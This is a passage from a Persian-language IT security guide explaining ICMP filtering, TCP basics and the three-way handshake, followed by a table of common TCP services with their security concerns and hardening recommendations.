‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺁﻧﻬﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺎﻳﺪ‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺪﻭﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻫﻴﭻ ﻣﺸﻜﻞ ﺟﺎﻧﺒﻲ‪،‬‬ ‫ﺑﻴﺸﺘﺮ ﺍﻧﻮﺍﻉ ﺑﺴﺘﻪﻫﺎﻱ ‪ ICMP‬ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺴﻴﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺭﻭﺩﻱ ‪ ICMP‬ﺍﺯ ﺍﻧﻮﺍﻉ ‪) ١٣ ،٥‬ﺩﺭﺧﻮﺍﺳﺖ ﻣﻬﺮ ﺯﻣﺎﻥ‪) ١٤ ،(٢٨٧‬ﭘﺎﺳﺦ ﻣﻬﺮ ﺯﻣﺎﻥ(‪) ١٧ ،‬ﺩﺭﺧﻮﺍﺳﺖ ‪ ،(address mask‬ﻭ ‪) ١٨‬ﭘﺎﺳﺦ‬
‫‪ ،(address mask‬ﻭ ﻧﻴﺰ ﺑﺴﺘﻪﻫﺎﻱ ﺧﺮﻭﺟﻲ ‪ ICMP‬ﺍﺯ ﺍﻧﻮﺍﻉ ‪) ١١ ،٥‬ﺍﺗﻤﺎﻡ ﻭﻗﺖ(‪) ١٢ ،‬ﻣﺸﻜﻞ ﺁﺭﮔﻮﻣﺎﻥ(‪ ،١٧ ،١٤ ،١٣ ،‬ﻭ ‪ ١٨‬ﺭﺍ ﺑﺒﻨﺪﻳﺪ‪.‬‬

‫‪TCP‬‬

‫‪ TCP‬ﻳﻚ ﺟﺮﻳﺎﻥ ﺍﻧﺘﻘﺎﻝ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﺑﺎ ﺣﻔﻆ ﺗﺮﺗﻴﺐ ﻭ ﺩﻭﻃﺮﻓﻪ ﻣﻴﺎﻥ ﺩﻭ ﺑﺮﻧﺎﻣﻪ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻭﺍﺣﺪ ﻳﺎ ﺩﻭ ﺭﺍﻳﺎﻧﺔ ﻣﺨﺘﻠﻒ ﺑﻪ‬
‫ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩﺍﻧﺪ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪" .‬ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ" ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﺷﻮﺩ ﻫﺮ ﺑﺎﻳﺖ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﺣﺘﻤﹰﺎ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﻣﻲﺭﺳﺪ‬
‫)ﻭ ﺩﺭﺻﻮﺭﺕ ﻋﺪﻡ ﻣﻮﻓﻘﻴﺖ ﻧﻴﺰ ﺣﺘﻤﹰﺎ ﺷﻤﺎ ﺍﺯ ﺁﻥ ﻣﻄﻠﻊ ﻣﻲﺷﻮﻳﺪ(‪ ،‬ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﺑﺎﻳﺘﻬﺎ ﺩﺭ ﻣﻘﺼﺪ ﺑﻪ ﻫﻤﺎﻥ ﺗﺮﺗﻴﺒﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﮔﺮﺩﻧﺪ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺍﺭﺗﺒﺎﻁ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﻗﻄﻊ ﺷﻮﺩ‪ ،‬ﺑﺎﻳﺘﻬﺎﻱ ﻣﻨﺘﻘﻞﻧﺸﺪﻩ ﺑﻪ ﻣﻘﺼﺪ ﻧﺨﻮﺍﻫﻨﺪ ﺭﺳﻴﺪ‪ ،‬ﻣﮕﺮ ﺁﻧﻜﻪ ﻳﻚ ﻣﺴﻴﺮ‬
‫ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ ﺁﻥ ﻣﻘﺼﺪ ﭘﻴﺪﺍ ﺷﻮﺩ‪ .‬ﺩﺭ ﭼﻨﻴﻦ ﺣﺎﻟﺘﻲ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺍﺯ ‪ TCP‬ﺑﺎﻳﺪ ﺑﻪ ﭘﺮﺩﺍﺯﺓ ﻓﺮﺳﺘﻨﺪﻩ ﻳﺎ ﮔﻴﺮﻧﺪﻩ ﻳﻚ ﭘﻴﻐﺎﻡ ﺧﻄﺎ‬
‫ﺩﻫﺪ‪ ،‬ﻧﻪ ﺍﻳﻨﻜﻪ ﻭﺍﻧﻤﻮﺩ ﻛﻨﺪ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ﻫﻨﻮﺯ ﺍﺯ ﻛﺎﺭﺍﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫ﻫﺮ ﺍﺗﺼﺎﻝ ‪ TCP‬ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺩﻭ ﺳﺮ ﺧﻮﺩ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ﻭ ﭘﻮﺭﺗﻬﺎ ﺑﺎ ﺷﻤﺎﺭﻩﻫﺎﻱ ‪ ١٦‬ﺑﻴﺘﻲ ﻣﺸﺨﺺ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﭘﺮﻭﺗﻜﻞ ‪ ،TCP‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺧﺪﻣﺎﺕ ﺧﻮﺩ ﺍﺯ ﻫﻤﺎﻥ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺗﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﻪ ﺁﻥ ﺳﺮﻭﻳﺲ‬
‫ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ‪ ،‬ﻭ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﻴﺰ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺍﺗﺼﺎﻻﺕ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻣﻌﻴﻦ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻌﻀﻲ ﺷﻤﺎﺭﻩ ﭘﻮﺭﺗﻬﺎﻱ‬
‫ﻣﻌﺮﻭﻑ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﭘﻮﺭﺕ ‪ ٨٠‬ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ HTTP‬ﻭ ﭘﻮﺭﺕ ‪ ٢٥‬ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪.SMTP‬‬
‫ﺩﺭ ﺭﻭﻱ ﺳﻴﻢ‪ ،‬ﺑﺴﺘﻪﻫﺎﻱ ‪ TCP‬ﻫﻤﺎﻥ ﺑﺴﺘﻪﻫﺎﻱ ‪ IP‬ﻫﺴﺘﻨﺪ ﻛﻪ ﻳﻚ ﺳﺮﺁﻳﻨﺪ ‪ TCP‬ﺑﻪ ﺁﻧﻬﺎ ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺳﺮﺁﻳﻨﺪ ﺷﺎﻣﻞ ﭼﻨﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮ ﻧﻴﺰ ﻫﺴﺖ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ‪:‬‬
‫ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕ ‪ TCP‬ﻣﺒﺪﺃ ﺑﺴﺘﻪ‪،‬‬ ‫•‬
‫ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕ ‪ TCP‬ﻣﻘﺼﺪ ﺑﺴﺘﻪ‪،‬‬ ‫•‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺩﻳﻒ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﮔﻴﺮﻧﺪﻩ ﺑﺘﻮﺍﻧﺪ ﻣﺤﺘﻮﻳﺎﺕ ﺑﺴﺘﻪ ﺭﺍ ﺩﺭ ﻣﻮﻗﻌﻴﺖ ﺩﺭﺳﺖ ﺧﻮﺩ ﺩﺭ ﺭﺷﺘﺔ ‪ TCP‬ﻗﺮﺍﺭ ﺩﻫﺪ‪،‬‬ ‫•‬
‫‪٢٨٨‬‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﻨﺘﺮﻝ ﺟﺮﻳﺎﻥ‪ ،‬ﻛﻪ ﺑﻪ ﮔﻴﺮﻧﺪﻩ ﺍﻃﻼﻉ ﻣﻲﺩﻫﺪ ﻓﺮﺳﺘﻨﺪﺓ ﺑﺴﺘﻪ ﭼﻨﺪ ﺑﺎﻳﺖ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ‪ ،‬ﻭ‬ ‫•‬
‫ﺳﺮﺟﻤﻊ‪.TCP ٢٨٩‬‬ ‫•‬

‫ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ‪ ،‬ﻫﺮ ﺍﺗﺼﺎﻝ ‪ IPv4‬ﺍﺯ ﻧﻮﻉ ‪ TCP‬ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺩﻭ ﻋﺪﺩ ‪ ٣٢‬ﺑﻴﺘﻲ ﻭ ﺩﻭ ﻋﺪﺩ ‪ ١٦‬ﺑﻴﺘﻲ ﻣﺸﺨﺺ ﻛﺮﺩ‪:‬‬

‫ﺁﺩﺭﺱ ﻣﻴﺰﺑﺎﻥ ﺍﻳﺠﺎﺩﻛﻨﻨﺪﺓ ﺍﺗﺼﺎﻝ )ﺍﺯ ﺳﺮﺁﻳﻨﺪ ‪(IP‬؛‬ ‫•‬


‫ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕ ﺍﻳﺠﺎﺩﻛﻨﻨﺪﺓ ﺍﺗﺼﺎﻝ )ﺍﺯ ﺳﺮﺁﻳﻨﺪ ‪(TCP‬؛‬ ‫•‬
‫ﺁﺩﺭﺱ ﻣﻴﺰﺑﺎﻥ ﻣﻘﺼﺪ ﺍﺗﺼﺎﻝ )ﺍﺯ ﺳﺮﺁﻳﻨﺪ ‪(IP‬؛ ﻭ‬ ‫•‬
‫ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕ ﻣﻘﺼﺪ ﺍﺗﺼﺎﻝ )ﺍﺯ ﺳﺮﺁﻳﻨﺪ ‪.(TCP‬‬ ‫•‬

‫ﭘﺮﻭﺗﻜﻞ ‪ TCP‬ﺍﺯ ﺩﻭ ﺑﻴﺖ ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﺮﺁﻳﺪ ﺑﺴﺘﻪ ﺑﻪ ﻧﺎﻣﻬﺎﻱ ‪ SYN‬ﻭ ‪ ACK‬ﺑﻤﻨﻈﻮﺭ ﺍﺭﺳﺎﻝ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺗﺼﺎﻟﻬﺎﻱ ﺟﺪﻳﺪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺑﺎﺯﻛﺮﺩﻥ ﻳﻚ ﺍﺗﺼﺎﻝ ‪ ،TCP‬ﻣﻴﺰﺑﺎﻥ ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﻳﻚ ﺑﺴﺘﻪ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﺓ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻓﺮﺳﺘﺪ ﻛﻪ ﺩﺭ‬
‫ﺁﻥ ﺑﻴﺖ ‪ SYN‬ﻣﻘﺪﺍﺭ ‪ ١‬ﻭ ﺑﻴﺖ ‪ ACK‬ﻣﻘﺪﺍﺭ ‪ ٠‬ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﺓ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺎ ﭘﺲ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺑﺴﺘﻪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﺮ‬
‫ﺩﻭ ﺑﻴﺖ ‪ SYN‬ﻭ ‪ ACK‬ﻣﻘﺪﺍﺭ ‪ ١‬ﺩﺍﺭﻧﺪ ﺍﻳﻦ ﺩﺭﺧﻮﺍﺳﺖ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ؛ ﻭ ﺩﺭ ﭘﺎﻳﺎﻥ ﻧﻴﺰ ﻣﻴﺰﺑﺎﻥ ﺍﻭﻝ ﻳﻚ ﺑﺴﺘﺔ ﺳﻮﻡ ﻣﻲﻓﺮﺳﺘﺪ ﻛﻪ ﺩﺭ ﺁﻥ‬

‫‪287 Timestamp‬‬
‫‪ ۲۸۸‬ﺑﻪ ﺍﻳﻦ ﻋﺪﺩ "ﭘﻨﺠﺮﺓ ‪ "TCP‬ﻣﻲﮔﻮﻳﻨﺪ‪.‬‬
‫‪289 Checksum‬‬
‫‪٣٩٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﻴﺖ ‪ ACK‬ﻣﻘﺪﺍﺭ ‪ ١‬ﻭﻟﻲ ﺑﻴﺖ ‪ SYN‬ﻣﻘﺪﺍﺭ ‪ ٠‬ﺩﺍﺭﺩ‪ .‬ﺑﻪ ﺍﻳﻦ ﺭﻭﻧﺪ‪ ،‬ﺩﺳﺖ ﺩﺍﺩﻥ ﺳﻪﻣﺮﺣﻠﻪﺍﻱ ‪ ٢٩٠TCP‬ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺑﺎ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ‬
‫ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺮﺁﻳﻨﺪ ﺁﻧﻬﺎ ﺑﻴﺖ ‪ SYN‬ﻣﻘﺪﺍﺭ ﺩﺍﺭﺩ ﻭﻟﻲ ‪ ACK‬ﻣﻘﺪﺍﺭ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻥ ﺑﺴﺘﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺍﺗﺼﺎﻝ ﺟﺪﻳﺪ ﺭﺍ‬
‫ﺍﺯ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﺗﺼﺎﻻﺕ ﺍﺯ ﻗﺒﻞ ﺍﻳﺠﺎﺩﺷﺪﻩ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﺸﺨﻴﺺ ﺩﺍﺩ‪ .‬ﺍﻳﻦ ﺗﻔﺎﻭﺕ ﻫﻨﮕﺎﻡ ﺳﺎﺧﺘﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ‬
‫ﻏﺮﺑﺎﻝﻛﻨﻨﺪﺓ ﺑﺴﺘﻪﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫‪ TCP‬ﺩﺭ ﺑﻴﺸﺘﺮ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﻧﺘﻘﺎﻝ ﭘﺎﻳﺪﺍﺭ ﻭ ﻫﻤﮕﺎﻡ ﻳﻚ ﺟﺮﻳﺎﻥ ﺩﺍﺩﻩ ﺩﺭ ﻳﻚ ﻳﺎ ﺩﻭ ﺟﻬﺖ ﺩﺍﺭﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ‪ TCP‬ﺩﺭ ﭘﺮﻭﺗﻜﻞ ‪ ،HTTP‬ﺧﺪﻣﺎﺕ ﭘﺎﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ‪ ،‬ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺩﺳﺘﻮﺭﺍﺕ ﺑﻪ‬
‫ﻧﻤﺎﻳﺸﮕﺮﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻢ ‪ X-Windows‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺟﺪﻭﻝ ‪-٥‬ﺍﻟﻒ ﭘﻮﺭﺗﻬﺎﻱ ﻣﻨﺘﺴﺐ ﺑﻪ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺧﺪﻣﺎﺕ‬
‫ﻣﻌﻤﻮﻝ ‪ TCP‬ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺧﺪﻣﺎﺕ‪ ،‬ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺑﺰﺭﮒ ﻭ ﺿﻌﻔﻬﺎﻱ ﻗﺎﺑﻞ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﺸﻒ ﺷﺪﻩ‪ ،‬ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ‬
‫ﻫﺮﻳﻚ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺳﺘﻪﺑﻨﺪﻱ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﺪﻣﺎﺕ ‪ TCP‬ﺑﻌﺒﺎﺭﺕ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺳﺮﻭﻳﺲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻭ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﺁﻏﺎﺯ ﮐﺮﺩ؛‬ ‫ﺍﻟﻒ‪.‬‬
‫ﭘﺮﻭﺗﻜﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻭ ﺑﺪﻭﻥ ﻫﻴﭽﮕﻮﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ )ﺗﺤﺖ ‪(IPv4‬؛‬ ‫ﺏ‪.‬‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺎﺩﺭﺳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ ،SMTP‬ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ ،CGI‬ﻭ ‪proxy‬ﻫﺎ‪ ،‬ﻳﻜﻲ ﺍﺯ ﻋﻮﺍﻣﻞ ﺍﺻﻠﻲ ﭘﺨﺶ ﻣﺠﺪﺩ‬ ‫ﺝ‪.‬‬
‫‪email‬ﻫﺎﻱ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ؛ ﻭ‬
‫ﻻ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻛﻪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻣﻌﺮﺽ ﺗﻬﺪﻳﺪ‬ ‫ﺳﺮﻭﻳﺲ ﻣﻌﻤﻮ ﹰ‬ ‫ﺩ‪.‬‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻭ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﺎﺑﻪ ﺣﻤﻼﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪290 TCP Three-Way Handshake‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٩٨‬‬

‫ﺟﺪﻭﻝ ‪-٥‬ﺍﻟﻒ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻣﻌﻤﻮﻝ ‪TCP‬‬

‫ﭘﻴﺸﻨﻬﺎﺩ ﻭﺿﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ‬ ‫ﻧﮕﺮﺍﻧﻴﻬﺎ‬ ‫ﻋﻤﻠﻜﺮﺩ‬ ‫ﻧﺎﻡ ﺳﺮﻭﻳﺲ‬ ‫ﭘﻮﺭﺕ ‪TCP‬‬


‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﭘﮋﻭﺍﻙ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ )ﺑﺮﺍﻱ ﺁﺯﻣﺎﻳﺶ(‬ ‫‪echo‬‬ ‫‪٧‬‬
‫ﺣﺬﻑ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ )ﺑﺮﺍﻱ ﺁﺯﻣﺎﻳﺶ(‬ ‫‪discard‬‬ ‫‪٩‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﺳﺎﻋﺎﺕ ﺭﻭﺯ ﺭﺍ ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ‬ ‫‪daytime‬‬ ‫‪١٣‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﻣﻮﻟﺪ ﻛﺎﺭﺍﻛﺘﺮ‬ ‫‪chargen‬‬ ‫‪١٩‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ؛ ﺍﺯ ‪ http‬ﻳﺎ ‪ ssh‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‬ ‫ﺏ‬ ‫ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ‬ ‫‪ftp‬‬ ‫‪٢١‬‬
‫ﺷﺪﻳﺪﹰﺍ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‬ ‫ﭘﻮﺳﺘﺔ ﺍﻳﻤﻦ )ﭘﺎﻳﺎﻧﻪ ﻭ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﻣﺠﺎﺯﻱ(‬ ‫‪ssh‬‬ ‫‪٢٢‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ؛ ﺍﺯ ‪ ssh‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‬ ‫ﺏ‬ ‫ﭘﺎﻳﺎﻧﺔ ﻣﺠﺎﺯﻱ‬ ‫‪telnet‬‬ ‫‪٢٣‬‬
‫ﺝ‬ ‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫‪smtp‬‬ ‫‪٢٥‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻟﻒ‬ ‫ﺳﺎﻋﺎﺕ ﺭﻭﺯ ﺭﺍ ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ‬ ‫‪time‬‬ ‫‪٣٧‬‬
‫ﺳﺮﻭﻳﺲ ﻧﺎﻡ ‪TCP‬‬ ‫‪nameserver‬‬ ‫‪٤٢‬‬
‫ﺳﺮﻭﻳﺲ ‪NIC whois‬‬ ‫‪whois‬‬ ‫‪٤٣‬‬
‫ﺩ‬ ‫ﺳﺮﻭﻳﺲ ﻧﺎﻡ ﺩﺍﻣﻨﻪ )‪(DNS‬‬ ‫‪domain‬‬ ‫‪٥٣‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ‬ ‫‪finger‬‬ ‫‪٧٩‬‬
‫ﺏ‪ ،‬ﺝ‬ ‫ﺷﺒﻜﻪ ﻭﺏ ﺟﻬﺎﻧﻲ )‪(WWW‬‬ ‫‪http‬‬ ‫‪٨٠‬‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺘﻦﺳﺎﺩﻩ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ ،‬ﻳﺎ‬
‫ﺏ‬ ‫ﭘﺮﻭﺗﻜﻞ ﺩﻓﺘﺮ ﭘﺴﺘﻲ )‪(POP3‬‬ ‫‪pop3‬‬ ‫‪١١٠‬‬
‫ﺑﺠﺎﻱ ﺁﻥ ﺍﺯ ‪ POP‬ﺭﻭﻱ ‪ TLS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺩ‬ ‫ﻓﺮﺍﺧﻮﺍﻧﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ )‪ (RPC‬ﺷﺮﻛﺖ ‪Sun‬‬ ‫‪sunrpc‬‬ ‫‪١١١‬‬
‫ﺍﺯ ﻧﺴﺨﻪﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﻧﺸﺎﻧﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ‬
‫ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺎﻡ ﻛﺎﺭﺑﺮ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬ ‫‪auth‬‬ ‫‪١١٣‬‬
‫ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ )ﭘﺎﻳﻴﻦ ﺭﺍ ﺑﺒﻴﻨﻴﺪ(‬
